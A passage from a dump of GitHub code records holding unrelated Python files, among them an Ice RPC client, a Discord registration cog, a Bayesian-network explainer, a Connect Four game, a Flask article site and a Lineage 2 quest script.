Ice.initialize(sys.argv)\n        base = communicator.stringToProxy(\"calc1/calc11:tcp -h 127.0.0.2 -p 10000 -z : udp -h 127.0.0.2 -p 10000 -z\")\n        printer = Demo.CalcPrx.checkedCast(base)\n        command = ''\n        while command != 'x':\n            print('=> ')\n            command = input()\n\n            if command == 'add':\n                result = printer.add(7, 8)\n                print(\"RESULT = \", result)\n            elif command == 'add2':\n                result = printer.add(7000, 8000)\n                print(\"RESULT = \", result)\n            elif command == 'subtract':\n                result = printer.subtract(7, 8)\n                print(\"RESULT = \", result)\n            # elif command == 'op':\n            #     a = A(11, 22, 33.0, \"ala ma kota\")\n            #     printer.op(a, 44)\n            #     print(\"DONE\")\n            elif command == 'x':\n                pass\n            else:\n                print('Unknown command')\n    except:\n        traceback.print_exc()\n    if communicator:\n        try:\n            communicator.destroy()\n        except:\n            traceback.print_exc()\n","repo_name":"Sharon131/Distributed-Systems-Laboratory","sub_path":"Zad6/Client/src/IceClient.py","file_name":"IceClient.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24749475402","text":"import discord\nimport logging\n\nfrom discord.ext import commands\n\nfrom seraphsix import constants\nfrom seraphsix.cogs.utils.message_manager import MessageManager\nfrom seraphsix.models.database import Member, Role\nfrom seraphsix.models.destiny import User, DestinyMembershipResponse\nfrom seraphsix.tasks.core import execute_pydest, register\n\nlog = logging.getLogger(__name__)\n\n\nclass RegisterCog(commands.Cog, name=\"Register\"):\n    def __init__(self, bot):\n        self.bot = bot\n\n    @commands.command()\n    @commands.cooldown(rate=2, per=5, type=commands.BucketType.user)\n    async def register(self, 
ctx):\n \"\"\"Register your Destiny 2 account with Seraph Six\n\n This command will let Seraph Six know which Destiny 2 profile to associate\n with your Discord profile. Registering is a prerequisite to using any\n commands that require knowledge of your Destiny 2 profile.\n \"\"\"\n manager = MessageManager(ctx)\n\n embed, user_info = await register(\n manager, confirm_message=\"Initial Registration Complete...\"\n )\n if not user_info:\n await manager.send_private_message(\n \"Oops, something went wrong during registration. Please try again.\"\n )\n return await manager.clean_messages()\n\n bungie_access_token = user_info.get(\"access_token\")\n\n # Fetch platform specific display names and membership IDs\n try:\n user = await execute_pydest(\n self.bot.destiny.api.get_membership_current_user,\n bungie_access_token,\n return_type=DestinyMembershipResponse,\n )\n except Exception as e:\n log.exception(e)\n await manager.send_private_message(\n \"I can't seem to connect to Bungie right now. Try again later.\"\n )\n return await manager.clean_messages()\n\n if not user.response:\n await manager.send_private_message(\n \"Oops, something went wrong during registration. Please try again.\"\n )\n return await manager.clean_messages()\n\n if not self.user_has_connected_accounts(user.response):\n await manager.send_private_message(\n \"Oops, you don't have any public accounts attached to your Bungie.net profile.\"\n )\n return await manager.clean_messages()\n\n bungie_user = User(user.response)\n\n member_ids = [\n (bungie_user.memberships.xbox.id, constants.PLATFORM_XBOX),\n (bungie_user.memberships.psn.id, constants.PLATFORM_PSN),\n (bungie_user.memberships.steam.id, constants.PLATFORM_STEAM),\n (bungie_user.memberships.stadia.id, constants.PLATFORM_STADIA),\n (bungie_user.memberships.blizzard.id, constants.PLATFORM_BLIZZARD),\n (bungie_user.memberships.bungie.id, constants.PLATFORM_BUNGIE),\n ]\n\n member_db = await self.bot.database.get_member_by_platform(\n bungie_user.memberships.bungie.id, constants.PLATFORM_BUNGIE\n )\n if not member_db:\n # Create a list of member id with their respective platforms, if the id is not null\n member_id_list = (\n (member_id, platform_id)\n for member_id, platform_id in member_ids\n if member_id\n )\n # Grab the first one and craft the query data\n member_id, platform_id = next(member_id_list)\n query_data = dict(member_id=member_id, platform_id=platform_id)\n\n # Query for that member, if that fails create a skeleton entry\n member_db = await self.bot.database.get_member_by_platform(**query_data)\n if not member_db:\n member_db = await Member.create()\n\n # Save OAuth credentials and Bungie User data\n for key, value in bungie_user.to_dict().items():\n setattr(member_db, key, value)\n\n member_db.discord_id = ctx.author.id\n member_db.bungie_access_token = bungie_access_token\n member_db.bungie_refresh_token = user_info.get(\"refresh_token\")\n await member_db.save()\n\n e = discord.Embed(colour=constants.BLUE, title=\"Full Registration Complete\")\n\n emojis = []\n # Update platform roles to match connected accounts\n if ctx.guild:\n guild_roles_db = await Role.filter(guild__guild_id=ctx.guild.id)\n member_platforms = [\n platform_id for member_id, platform_id in member_ids if member_id\n ]\n\n guild_roles = [\n discord.utils.get(ctx.guild.roles, id=role_db.role_id)\n for role_db in guild_roles_db\n if role_db.platform_id in member_platforms\n ]\n\n await ctx.author.add_roles(*guild_roles)\n\n platform_names = list(constants.PLATFORM_MAP.keys())\n 
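# PLATFORM_MAP maps platform names to ids; these parallel lists resolve each connected id back to its name, and from there to its emoji\n            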
platform_ids = list(constants.PLATFORM_MAP.values())\n\n platform_emojis = [\n constants.PLATFORM_EMOJI_MAP.get(\n platform_names[platform_ids.index(platform)]\n )\n for platform in member_platforms\n ]\n\n message = f\"User {str(ctx.author)} ({ctx.author.id}) has registered\"\n\n if platform_emojis:\n emojis = \" \".join(\n [\n str(self.bot.get_emoji(emoji))\n for emoji in platform_emojis\n if emoji\n ]\n )\n e.add_field(name=\"Platforms Connected\", value=emojis)\n message = f\"{message} with platforms {emojis}\"\n\n await embed.edit(embed=e)\n await self.bot.reg_channel.send(message)\n\n return await manager.clean_messages()\n\n def user_has_connected_accounts(self, user):\n \"\"\"Return true if user has connected destiny accounts\"\"\"\n if user.destiny_memberships:\n return True\n\n\ndef setup(bot):\n bot.add_cog(RegisterCog(bot))\n","repo_name":"henworth/SeraphSix","sub_path":"seraphsix/cogs/register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":6049,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"36563129564","text":"from abc import ABC, abstractmethod\nfrom itertools import product\nimport numpy as np\nfrom probExplainer import utils\n\n\nclass Model(ABC):\n # CONSTRUCTOR\n def __init__(self, implementation):\n self.implementation = implementation\n self.variables_labels = dict()\n self.name = \"\"\n\n # GETTERS\n def get_implementation(self):\n return self.implementation\n\n def get_name(self):\n return self.name\n\n def get_variables(self):\n return sorted(list(self.variables_labels.keys()))\n\n def get_variables_labels(self):\n return self.variables_labels\n\n def get_domain_of(self, variables) -> list:\n domains = []\n for variable in variables:\n domains.append(self.variables_labels[variable])\n return [p for p in product(*domains)]\n\n # INTERFACE\n # MAP-Query (multivariate predict)\n # Gets the a posteriori distribution of y_names\n # evidence: dataframe_series or dict\n # if y_names not given, the ones not in X will be used\n def maximum_a_posteriori(self, evidence, target):\n posterior = self.compute_posterior(evidence, target)\n return self.argmax(posterior, target)\n\n @abstractmethod\n def compute_posterior(self, evidence: dict, target: list) -> np.array:\n pass\n\n @abstractmethod\n def evidence_likelihood(self, evidence: dict):\n pass\n\n # Univariate predict\n # Gets the univariate a posteriori distribution for attribute in y_names\n # It could also be added as an input in the previous function\n def compute_univariate(self, evidence: dict, target: list):\n pass\n\n def map_independence(self, set_r: list, ev_vars: dict, map: dict, posterior=None, return_jsd=False):\n if return_jsd:\n map_dep, jsd = self.map_dependence(set_r, ev_vars, map, posterior=posterior, return_jsd=True)\n return not map_dep, jsd\n else:\n return not self.map_dependence(set_r, ev_vars, map)\n\n def map_dependence(self, set_r: list, ev_vars: dict, map: dict, posterior=None, return_jsd=False):\n if return_jsd and posterior is None:\n err = \"For the Jensen-Shannon divergence to be computed, the parameter \\\"posteriors\\\"\" \\\n \" should contain an array representing the probabilities of the targets y given the evidence\"\n raise Exception(err)\n\n # Check which are the supplementary (missing) variables\n variables = self.get_variables()\n supp_vars = []\n for var in variables:\n if var not in list(ev_vars.keys()) and var not in list(map.keys()):\n supp_vars.append(var)\n # Check if R in unobserved\n for R in 
set_r:\n if R not in supp_vars:\n err = \"The variable \" + R + \" is in the set R but is not a supplementary node\"\n raise Exception(err)\n\n # Obtain domain of R\n omega_r = self.get_domain_of(set_r)\n # For each value assignment r in omega(R)\n jsd = 0\n for value_assignment_r in omega_r:\n # Fill in values\n ev_vars_alt = ev_vars.copy()\n for i, value in enumerate(value_assignment_r):\n ev_vars_alt[set_r[i]] = value\n # print(instance)\n # print(instance_alt)\n # Inference with evidence and r\n try:\n posterior_alt = self.compute_posterior(evidence=ev_vars_alt, target=list(map.keys()))\n map_alt = self.argmax(posterior_alt, list(map.keys()))[0]\n # Check if we need to compute the jsd divergence between P(H|e) and P(H|e,r)\n if return_jsd:\n jsd = max(jsd, utils.JSD(posterior, posterior_alt))\n if map != map_alt:\n if return_jsd:\n return True, jsd\n else:\n return True\n except ImplausibleEvidenceException:\n continue\n if return_jsd:\n return False, jsd\n else:\n return False\n\n def map_independence_strength(self, set_r: list, ev_vars: dict, map: dict):\n # Check which are the supplementary (missing) variables\n variables = self.get_variables()\n supp_vars = []\n for var in variables:\n if var not in list(ev_vars.keys()) and var not in list(map.keys()):\n supp_vars.append(var)\n # Check if R in unobserved\n for R in set_r:\n if R not in supp_vars:\n err = \"The variable \" + R + \" is in the set R but is not a supplementary node\"\n raise Exception(err)\n\n # Obtain domain of R\n omega_r = self.get_domain_of(set_r)\n # For each value assignment r in omega(R)\n p_r_given_e = self.compute_posterior(evidence=ev_vars, target=set_r)\n #print(set_r)\n #print(p_r_given_e)\n strength = 0\n for value_assignment_r in omega_r:\n # Fill in values\n ev_vars_alt = ev_vars.copy()\n for i, value in enumerate(value_assignment_r):\n ev_vars_alt[set_r[i]] = value\n try:\n posterior_alt = self.compute_posterior(evidence=ev_vars_alt, target=list(map.keys()))\n map_alt = self.argmax(posterior_alt, list(map.keys()))[0]\n #print(\"R value: \", {i[0]: i[1] for i in zip(set_r, value_assignment_r)})\n #print(\"MAP alternative: \",map_alt)\n # Check if we need to compute the jsd divergence between P(H|e) and P(H|e,r)\n if map == map_alt:\n strength = strength + utils.get_probability(self, array_prob=p_r_given_e, dim_names=set_r,\n assignment={i[0]: i[1] for i in zip(set_r, value_assignment_r)})\n except ImplausibleEvidenceException:\n continue\n if strength < 0 :\n strength = 0\n if strength > 1 :\n strength = 1\n return strength\n\n def argmax(self, array_prob, dim_names=None):\n if dim_names is None:\n dim_names = list(range(len(array_prob.shape)))\n assert (len(array_prob.shape) == len(dim_names))\n max_index = np.unravel_index(array_prob.argmax(), array_prob.shape)\n return {dim_names[i]: self.get_domain_of([dim_names[i]])[max_index[i]][0] for i in range(len(dim_names))}, \\\n array_prob[max_index]\n\n def argmin(self, array_prob, dim_names=None):\n if dim_names is None:\n dim_names = list(range(len(array_prob.shape)))\n assert (len(array_prob.shape) == len(dim_names))\n max_index = np.unravel_index(array_prob.argmin(), array_prob.shape)\n return {dim_names[i]: self.get_domain_of([dim_names[i]])[max_index[i]][0] for i in range(len(dim_names))}, \\\n array_prob[max_index]\n\n\nclass ImplausibleEvidenceException(Exception):\n 
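\"\"\"Raised when the supplied evidence is impossible under the model, so no posterior can be computed.\"\"\"\n    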
pass\n","repo_name":"Enrique-Val/ProbExplainer","sub_path":"probExplainer/model/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":6911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20418623821","text":"import numpy as np\n\nROWS = 7\nCOLS = 6\n\ndef create_board():\n #board = [[0] * COLS for _ in range(ROWS)]\n board = np.zeros((COLS,ROWS))\n return board\n\ndef valid_selection(board,col):\n return board[5][col] == 0 # valid selection\n\ndef next_open_row(board,col):\n # gets the row the piece falls on\n for r in range(ROWS):\n if board[r][col] == 0:\n return r\n\ndef drop_piece(board,row,col,piece):\n board[row][col] = piece\n\ndef print_board(board):\n print(np.flip(board,0))\n\ndef inBounds(board,r,c):\n n,m = len(board), len(board[0])\n return 0 <= r < n and 0 <= c < m\n\ndef dfsv(board,r,c,piece,cnt):\n\n while inBounds(board,r,c) and board[r][c] == piece:\n r+=1\n cnt+=1\n if cnt == 4: return True\n # vertital\n return False\n \n \ndef dfsh(board,r,c,piece,cnt):\n \n while inBounds(board,r,c) and board[r][c] == piece:\n c+=1\n cnt+=1\n if cnt == 4: return True\n return False\n # horizontal\n \n\ndef dfsd(board,r,c,piece,cnt):\n \n while inBounds(board,r,c) and board[r][c] == piece:\n r+=1\n c+=1\n cnt+=1\n if cnt == 4: return True\n # diagonal\n return False\n\ndef win(board):\n\n for i in range(len(board)):\n for j in range(len(board[0])):\n if board[i][j] == 1 or board[i][j] == 2:\n \n horizontal = dfsh(board,i,j+1,board[i][j],1)\n vertical = dfsv(board,i+1,j,board[i][j],1)\n diagonal = dfsd(board,i+1,j+1,board[i][j],1)\n \n if horizontal == True or vertical == True or diagonal == True:\n return True\n \n \n return False\n \n # dfs vertical \n # dfs horizontal\n # dfs diafonal\n\n\nboard = create_board()\nprint_board(board)\ngame_over = False\n\nturn = 0\n\nwhile not game_over:\n # player 1 turn\n if turn % 2 == 0:\n col = int(input('Player 1! Please make your selection (0-6).'))\n if valid_selection(board,col):\n row = next_open_row(board,col)\n drop_piece(board,row,col,1)\n\n else:\n col = int(input('Player 2! 
Please make your selection (0-6).'))\n if valid_selection(board,col):\n row = next_open_row(board,col)\n drop_piece(board,row,col,2)\n print_board(board)\n game_over = win(board)\n \n turn +=1\nprint(\"Congrats Player\" +str(((turn-1)%2) + 1)+ \" !!!\")\n","repo_name":"loosesoup/chest","sub_path":"c4cli.py","file_name":"c4cli.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6759056722","text":"from konradtechnologies_rtms.rtms_client import *\nfrom konradtechnologies_rtms.target import RadarTarget, DynamicRadarTarget\n\n\ndef dynamic_target_example(ip_address):\n # Create RTMS object\n rtms_client = RtmsClient(ip_address)\n\n # Connect to RTMS\n rtms_client.connect()\n\n # Create two dynamic targets\n # The first target will move out from 20m to 80m, then back 40m\n moving_target_1 = [DynamicRadarTarget(start_x=0, start_y=20, end_x=0, end_y=80, rcs=30, velocity=10),\n DynamicRadarTarget(start_x=0, start_y=80, end_x=0, end_y=40, rcs=30, velocity=20)]\n\n # The second target will move from 100m to 120m.\n moving_target_2 = [DynamicRadarTarget(start_x=0, start_y=100, end_x=0, end_y=120, rcs=30, velocity=5)]\n\n # Send the targets to RTMS\n rtms_client.set_dynamic_range_targets([moving_target_1, moving_target_2])\n\n # Disconnect\n rtms_client.disconnect()\n\n\ndef main():\n \"\"\"Uncomment the example you'd like to run. For each example,\n replace the IP address with one that is appropriate for your\n connection to RTMS.\"\"\"\n ip_address = \"127.0.0.1\"\n\n dynamic_target_example(ip_address)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"konradtechnologies/rtms-python","sub_path":"examples/dynamic_target.py","file_name":"dynamic_target.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5857358026","text":"\"\"\"Commonly used hyperparameters and utility functions\"\"\"\n\nimport math\nimport numpy as np\nimport generator as g\nfrom features import features_by_name\n\n# reproducibility\nSTATE = np.random.RandomState(42)\n\nGENERATOR_DEFAULTS = {\n \"interm_nodes_dist\": lambda r: round(g.truncnorm(r, mean=5, sd=3, low=0)),\n \"pos_dist\": lambda r: r.uniform(low=(0, 0), high=(25, 25)),\n \"capacity_dist\": lambda r: g.truncnorm(r, mean=35, sd=10, low=0),\n \"power_dist\": lambda r: r.normal(30, 2),\n \"interm_blocks_dist\": lambda r: round(g.truncnorm(r, mean=3, sd=2, low=0)),\n \"pairwise_connection\": lambda r: r.rand() < 0.1,\n \"block_weight_dist\": lambda r: g.truncnorm(r, mean=10, low=0, sd=7),\n # mean equivalent to a linear SINRth of 20, which is what marvelo uses\n \"requirement_dist\": lambda r: g.truncnorm(r, mean=4, low=0, sd=1),\n \"num_sources_dist\": lambda r: round(g.truncnorm(r, mean=2, sd=1, low=1)),\n \"connection_choice\": lambda r, a: r.choice(a),\n}\n\nMARVELO_DEFAULTS = {\n # 4-9 nodes total, including source+sink\n \"interm_nodes_dist\": lambda r: r.randint(2, 7 + 1),\n \"pos_dist\": lambda r: r.uniform(low=(0, 0), high=(25, 25)),\n \"capacity_dist\": lambda r: r.randint(21, 21 * (2 + r.rand())),\n # always 1 watt\n \"power_dist\": lambda r: 30,\n # 3-6 blocks total, including source+sink\n \"interm_blocks_dist\": lambda r: r.randint(1, 4 + 1),\n \"pairwise_connection\": lambda r: False,\n \"block_weight_dist\": lambda r: r.rand() * 20,\n # equivalent to a constant linear SINRth of 20\n \"requirement_dist\": lambda r: math.log(20 + 1, 2),\n 
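# marvelo-style instances are generated with exactly one source\n    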
\"num_sources_dist\": lambda r: 1,\n \"connection_choice\": lambda r, a: r.choice(a),\n}\n\nDEFAULT_FEATURES = [\n features_by_name()[name]\n for name in [\n \"node_relay\",\n \"edge_additional_timeslot\",\n \"edge_datarate_fraction\",\n \"edge_capacity\",\n \"node_options_lost\",\n ]\n]\n\nDEFAULT = {\n \"learnsteps\": 30000,\n \"prioritized_replay_alpha\": 0.6,\n \"prioritized_replay_beta0\": 0.4,\n \"prioritized_replay_beta_iters\": None, # all steps\n \"prioritized_replay_eps\": 1e-6,\n \"learning_starts\": 1000,\n \"buffer_size\": 50000,\n \"lr\": 5e-4,\n \"grad_norm_clipping\": 5,\n \"gamma\": 0.9,\n \"target_network_update_freq\": 500,\n \"train_freq\": 4,\n \"batch_size\": 32,\n \"early_exit_factor\": np.infty,\n \"num_processing_steps\": 40,\n \"latent_size\": 16,\n \"num_layers\": 5,\n \"seedgen\": lambda: STATE.randint(0, 2 ** 32),\n \"experiment_name\": \"default\",\n \"prioritized\": True,\n \"features\": DEFAULT_FEATURES,\n \"generator_args\": GENERATOR_DEFAULTS,\n \"restart_reward\": 0,\n \"success_reward\": 0,\n \"additional_timeslot_reward\": -1,\n \"exploration_fraction\": 0.2,\n \"rl_seed\": STATE.randint(0, 2 ** 32),\n}\n","repo_name":"timokau/wsn-embedding-rl","sub_path":"hyperparameters.py","file_name":"hyperparameters.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37801511528","text":"\r\ndef ReviewCrawler(URL):\r\n from selenium import webdriver\r\n import time\r\n import pandas as pd\r\n url = URL\r\n\r\n driver = webdriver.Chrome(\"/Users/hansuho/PycharmProjects/chrome_driver/chromedriver\")\r\n driver.get(url)\r\n # driver.maximize_window()\r\n time.sleep(5)\r\n\r\n\r\n review_dict = {}\r\n try:\r\n total_review_window = driver.find_element_by_class_name(\"lNyfxzGc\")\r\n total_rating = total_review_window.find_element_by_css_selector(\".DrjyGw-P._1SRa-qNz._3t0zrF_f._1QGef_ZJ\").text\r\n total_review_cnt = total_review_window.find_element_by_css_selector(\".DrjyGw-P._26S7gyB4._14_buatE._2nPM5Opx\").text\r\n\r\n satisfactions = total_review_window.find_elements_by_css_selector(\"._1P_xnQHX\")\r\n satisfactions_list = []\r\n for satisfaction in satisfactions:\r\n each_cnt = satisfaction.find_element_by_css_selector(\".DrjyGw-P._26S7gyB4._1dimhEoy\").text\r\n satisfactions_list.append(each_cnt)\r\n review_dict[0] = {'total_rating': total_rating, \"total_review_cnt\": total_review_cnt,\r\n 'very satisfied': satisfactions_list[0], 'satisfied': satisfactions_list[1],\r\n 'neither satisfied nor dissatisfied': satisfactions_list[2],\r\n 'dissatisfied': satisfactions_list[3], 'very dissatisfied': satisfactions_list[4]}\r\n except:\r\n pass\r\n\r\n\r\n review_num = 1\r\n for i in range(2):\r\n time.sleep(5)\r\n # contents = driver.find_element_by_class_name(\"_1c8_1ITO\")\r\n # reviews = contents.find_elements_by_css_selector(\"div\")\r\n reviews = driver.find_elements_by_css_selector(\"#tab-data-qa-reviews-0 > div > div._1c8_1ITO > div\")\r\n\r\n for review in reviews[:-1]: # reviews 는 한 페이지에 있는 리뷰 10개\r\n try:\r\n writer = review.find_element_by_css_selector(\"._7c6GgQ6n._22upaSQN._37QDe3gr.WullykOU._3WoyIIcL\").text\r\n review_title = review.find_element_by_class_name(\"_2tsgCuqy\").text\r\n review_date = review.find_element_by_class_name(\"_3JxPDYSx\").text\r\n content = review.find_elements_by_class_name(\"_2tsgCuqy\")[1].text\r\n rating = review.find_element_by_class_name(\"zWXXYhVR\").get_attribute(\"title\")\r\n rating = rating[-3:]\r\n 
review_dict[review_num] = {\"writer\": writer, \"review_title\": review_title, \"review_date\": review_date,\r\n                                          \"content\": content, \"rating\": rating}\r\n            except:\r\n                continue\r\n\r\n            review_num += 1\r\n        if i < 1: # do not try to advance past the last page\r\n            try: # click the next-page button\r\n                next_button = driver.find_element_by_xpath('//*[@id=\"tab-data-qa-reviews-0\"]/div/div[5]/div[11]/div[1]/div/div[1]/div[2]/div/a')\r\n                driver.execute_script(\"arguments[0].click();\", next_button)\r\n            except:\r\n                print(\"No reviews on the next page.\")\r\n                break\r\n    time.sleep(3)\r\n    driver.close()\r\n    return review_dict\r\n\r\n\r\n\r\n## test\r\n# a = ReviewCrawler('https://www.tripadvisor.co.kr/Attraction_Review-g1074321-d3805449-Reviews-Bongjeongsa_Temple-Andong_Gyeongsangbuk_do.html')\r\n# print(a)\r\n\r\n\r\n'''\r\nThe pageNumbers class is laid out as span-a-a-a (or a-span-a-a on page 2), so\r\nclick the <a> at the position given by span.text (the current page number).\r\n'''\r\n'''\r\nreview = reviews[0].find_element_by_class_name(\"IRsGHoPm\")\r\nrating = reviews[0].find_element_by_css_selector(\".ui_bubble_rating\").get_attribute(\"class\")\r\n    # class=\"ui_bubble_rating bubble_50\": the space in the middle means two separate classes, so fetch the full class attribute with get_attribute\r\n    # the number at the end of the class changes with the rating, so select by the first (space-separated) class and read back the whole class name\r\n'''\r\n\r\n","repo_name":"hansuho113/CrawlingPractice","sub_path":"Trip-Advisor/ReviewCrawling.py","file_name":"ReviewCrawling.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26139538317","text":"from flask import Flask, request, render_template, g, flash\nimport logging\nfrom logging.handlers import RotatingFileHandler\nfrom article import Article\n\napp = Flask(__name__, static_url_path=\"\", static_folder=\"static\")\napp.secret_key = 'secretKey'\n\n\n@app.teardown_appcontext\ndef close_connection(exception):\n    db = getattr(g, '_database', None)\n    if db is not None:\n        db.close()\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n    articles = Article()\n    if request.method == \"POST\" and request.form[\"search_string\"]:\n        query_string = request.form[\"search_string\"]\n        articles = articles.search(query_string)\n        return render_template(\"index.html\",\n                               articles=articles)\n    else:\n        articles = articles.get_five_more_recent()\n        return render_template(\"index.html\",\n                               articles=articles)\n\n\n@app.route(\"/article/<int:identifiant>\", methods=[\"GET\"])\ndef show_article(identifiant):\n    article = Article()\n    article = article.get_article(identifiant)\n    if article is None:\n        return render_template(\"404.html\"), 404\n    return render_template(\"article/single_article.html\", article=article)\n\n\n@app.route(\"/edit/<int:identifiant>\", methods=[\"GET\", \"POST\"])\ndef edit_article(identifiant):\n    article = Article()\n    if request.method == \"GET\":\n        article = article.get_article(identifiant)\n        if article is None:\n            return render_template(\"404.html\"), 404\n        return render_template(\"article/edit_article.html\", article=article)\n    else:\n        status = article.update(identifiant, request.form)\n        if status == \"success\":\n            message = {\"status\": \"success\", \"message\": \"Article updated\"}\n            flash(message)\n        else:\n            message = {\"status\": \"danger\", \"message\": \"An error occurred\"}\n            flash(message)\n        article = article.get_article(identifiant)\n        return render_template(\"article/edit_article.html\", article=article)\n\n\n@app.route(\"/admin\", methods=[\"GET\"])\ndef admin():\n    article = Article()\n    all_articles = article.get_all_articles()\n    return 
render_template(\"article/all_articles.html\", articles=all_articles)\n\n\n@app.route(\"/admin-nouveau\", methods=[\"GET\", \"POST\"])\ndef new_admin():\n if request.method == \"GET\":\n return render_template(\"article/article_form.html\",\n action=\"/admin-nouveau\", article=\"\")\n else:\n article = Article()\n obj = article.create_article(request.form)\n if(obj[\"status\"] == \"success\"):\n message = {\"status\": \"success\", \"message\": \"Article created\"}\n flash(message)\n else:\n message = {\"status\": \"danger\",\n \"message\": \"All input are required.\"}\n flash(message)\n\n return render_template(\"article/article_form.html\", article=obj[\"obj\"])\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n app.logger.info(e)\n return render_template('404.html'), 404\n\n\n@app.errorhandler(500)\ndef page_not_found(e):\n app.logger.info(e)\n return render_template('500.html'), 500\n\nif __name__ == \"__main__\":\n handler = RotatingFileHandler('log_info.log',\n maxBytes=10000, backupCount=1)\n handler.setLevel(logging.INFO)\n app.logger.addHandler(handler)\n app.run(debug=True)\n","repo_name":"davidboutet/inf3005_tp1","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14895289859","text":"from setuptools import setup, find_packages\nfrom pathlib import Path\n\ndescription = \"Python library for automation tests of smart cards using \"\\\n \"virtualization.\"\n\nhere = Path(__file__).parent # return directory of current file\nreadme = Path(here, \"README.md\")\nrequirements = Path(here, \"requirements.txt\")\n\nwith requirements.open() as f:\n reqs = f.readlines()\n\nwith readme.open() as f:\n long_description = f.read()\n\ngraphical_reqs = [\n 'python-uinput',\n 'opencv-python',\n 'pandas',\n 'numpy',\n 'pytesseract',\n 'keyboard',\n]\n\nsetup(\n name=\"SCAutolib\",\n version=\"1.1.0\",\n description=description,\n long_description=long_description,\n long_description_content_type='text/markdown',\n url=\"https://github.com/redhat-qe-security/SCAutolib\",\n author=\"Pavel Yadlouski\",\n author_email=\"pyadlous@redhat.com\",\n classifiers=[\n 'Programming Language :: Python :: 3',\n 'Environment :: Console',\n 'Framework :: Pytest',\n 'Framework :: tox',\n 'Intended Audience :: Developers',\n 'Operating System :: Unix',\n 'Topic :: Software Development :: Testing',\n 'Topic :: Software Development :: Testing :: Acceptance',\n ],\n packages=find_packages(),\n python_requires='>=3',\n install_requires=reqs,\n extras_require={\n 'graphical': graphical_reqs\n },\n include_package_data=True,\n tests_require=[\"pytest\", \"pytest-env\"],\n entry_points={\n \"console_scripts\": [\"scauto=SCAutolib.cli_commands:cli\"]\n }\n)\n","repo_name":"ondrej-mach/SCAutolib","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"36432605430","text":"from com.it.br.gameserver.model.quest import State\nfrom com.it.br.gameserver.model.quest import QuestState\nfrom com.it.br.gameserver.model.quest.jython import QuestJython as JQuest\n\nqn = \"NoblesseTeleport\"\nNPC=[30006,30059,30080,30134,30146,30177,30233,30256,30320,30540,30576,30836,30848,30878,30899,31275,31320,31964]\n\nclass Quest (JQuest) :\n\n def __init__(self,id,name,descr): JQuest.__init__(self,id,name,descr)\n\n def onTalk (Self,npc,player):\n st = 
player.getQuestState(qn) \n        if player.isNoble() == 1 :\n            htmltext=\"noble.htm\"\n        else :\n            htmltext=\"nobleteleporter-no.htm\"\n            st.exitQuest(1)\n        return htmltext\n\nQUEST = Quest(2000,qn,\"Teleports\")\nCREATED = State('Start', QUEST)\n\nQUEST.setInitialState(CREATED)\n\nfor item in NPC:\n    QUEST.addStartNpc(item)\n    QUEST.addTalkId(item)","repo_name":"L2jBrasil/L2jBrasil","sub_path":"L2JBrasil_DP/data/jscript/teleports/NoblesseTeleport/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"39907095467","text":"from os import walk\nlisteFichiers=[]\nfor (repertoire, sousRepertoires, fichiers) in walk(\"./data/\"):\n    listeFichiers.extend(fichiers)\nlisteFichiers.sort()\n\nfor name in listeFichiers:\n    fichier=open(\"./data/\"+name,\"r\")\n    readata=fichier.readlines()\n    date_heure=name.split(\".\")\n    date_heure=date_heure[0][4:]\n    for i in range(len(readata)):\n        readata[i]=readata[i].split(\";\")\n        readata[i][2]=readata[i][2].replace(\"\\n\",\"\")\n        # all of this just to strip the trailing \\n, great\n        temp=open(\"./parkings/\"+readata[i][0]+\".dat\",\"a\")\n        temp.write(date_heure+\";\"+readata[i][0]+\";\"+readata[i][1]+\";\"+readata[i][2])\n        temp.write(\"\\n\")\n        temp.close()\n        print(\"Data \"+date_heure+\" written to its file \"+readata[i][0]+\".dat\")","repo_name":"ThibaultGarcia/SAE15_22-23","sub_path":"datapark.py","file_name":"datapark.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40861015195","text":"\n\n\nimport discord\nfrom discord.errors import HTTPException\nfrom discord.ext import commands\nimport platform\nimport assets\nimport utilities\nwatermark = utilities.get_json(assets.watermark_file)\n\nclass botinfo(commands.Cog):\n    def __init__(self, bot):\n        self.bot = bot\n\n\n\n    @commands.command(name='botinfo')\n    async def botinfo(self, ctx):\n\n        discord_version = discord.__version__\n        python_version = platform.python_version()\n        total_guilds = len(self.bot.guilds)\n        total_members = len(set(self.bot.get_all_members()))\n        ping = 'Pong! 
